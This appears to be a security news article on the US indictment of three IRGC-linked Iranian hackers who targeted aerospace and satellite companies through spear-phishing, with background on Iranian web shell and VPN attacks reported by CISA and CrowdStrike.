Three Iranian hackers residing in Iran have been indicted for stealing data from aerospace and satellite tracking companies.
The hackers were employed in a coordinated campaign of identity theft and hacking on behalf of Iran’s Islamic Revolutionary Guard Corps (IRGC), a designated foreign terrorist organization. The campaign aimed at stealing critical information related to United States aerospace and satellite technology and resources.
The indictment charged Said Pourkarim Arabi, 34, Mohammad Reza Espargham, 25, and Mohammad Bayati, 34.
The hacking campaign has been active since July 2015 and continued until at least February 2019.
“The defendants at one time possessed a target list of over 1,800 online accounts, including accounts belonging to organizations and companies involved in aerospace or satellite technology and international government organizations in Australia, Israel, Singapore, the United States, and the United Kingdom.” reads the DoJ’s press release.
The campaign targeted multiple organizations from both the US and abroad, hackers focus on the theft of commercial information and intellectual property.
The three hackers used fake online profiles and email accounts to impersonate US citizens working in the satellite and aerospace fields.
The threat actors used fake identities to target individuals at the organizations of interest. Upon clicking on a link included in the spear-phishing messages the infection process started.
The Iranian hackers targeted individuals included in a list of 1,800 online accounts belonging to people working with aerospace and satellite companies, and government organizations. Targeted entities are in Australia, Israel, Singapore, the US, and the UK.
“Today’s charges are yet another example of the FBI’s dedication to investigating those who target and attempt to steal data and proprietary information from the United States,” said James A. Dawson, Assistant Director in Charge of the FBI’s Washington Field Office. “Today’s charges allege that these individuals conspired in a coordinated campaign with known IRGC members and acted at their direction. The defendants targeted thousands of individuals in an attempt to steal critical information related to United States aerospace and satellite technology. The FBI remains dedicated to protecting the United States, and we continue to impose risk and consequences on cyber adversaries through our unique authorities, world-class capabilities, and enduring partnerships.”
According to a recently published CISA’s report, Iranian hackers from an unnamed APT group are employing several known web shells, in attacks on IT, government, healthcare, financial, and insurance organizations across the United States. The malware used by the threat actors includes the ChunkyTuna, Tiny, and China Chopper web shells.
The Iranian hackers belong to an Iran-based threat actor that was behind attacks exploiting vulnerabilities in Pulse Secure VPN, Citrix Application Delivery Controller (ADC) and Gateway, and F5’s BIG-IP ADC products.
A few weeks ago, researchers from Crowdstrike revealed that the Iran-linked APT group tracked as Pioneer Kitten, also known as Fox Kitten or Parisite, is now trying to monetize its efforts by selling access to some of the networks it has hacked to other hackers.
The Iranian hackers have been attacking corporate VPNs over the past months, they have been hacking VPN servers to plant backdoors in companies around the world targeting Pulse Secure, Fortinet, Palo Alto Networks, and Citrix VPNs.
The CISA MAR includes technical details of 19 malicious files, including multiple components of the China Chopper web shell, such as an ASP application that listens for incoming HTTP connections from a remote operator.
Once infected hackers used multiple tools to steal sensitive data and maintain a foothold in the target networks. The list of tools in the arsenal of the group includes Metasploit, Mimikatz, NanoCore, and a generic Python backdoor.
The leader of the group was Arabi, the man was identified by US officials as a member of Iran’s Islamic Revolutionary Guard Corps (IRGC). The man participated in many other operations against US and US firms.
According to investigators, Arabi lived in IRGC housing.
Espargham also used the online moniker “Reza Darkcoder” and “M.R.S.CO,” and he was known to be the leader of the Iranian Dark Coders Team, a group of website defacers.
Arabi and Espargham collaborated to target aerospace and satellite companies. The white-hat hacker provided Arabi with malware and supported him in hacking operations. He also created a tool named VBScan that scanned vBulletin forums for vulnerabilities.
The third hacker also provided the group with malware to use in their cyber attacks.
All three remain at large in Iran and have been added to the FBI’s Cyber Most Wanted List.
(SecurityAffairs – hacking, Iranian hackers)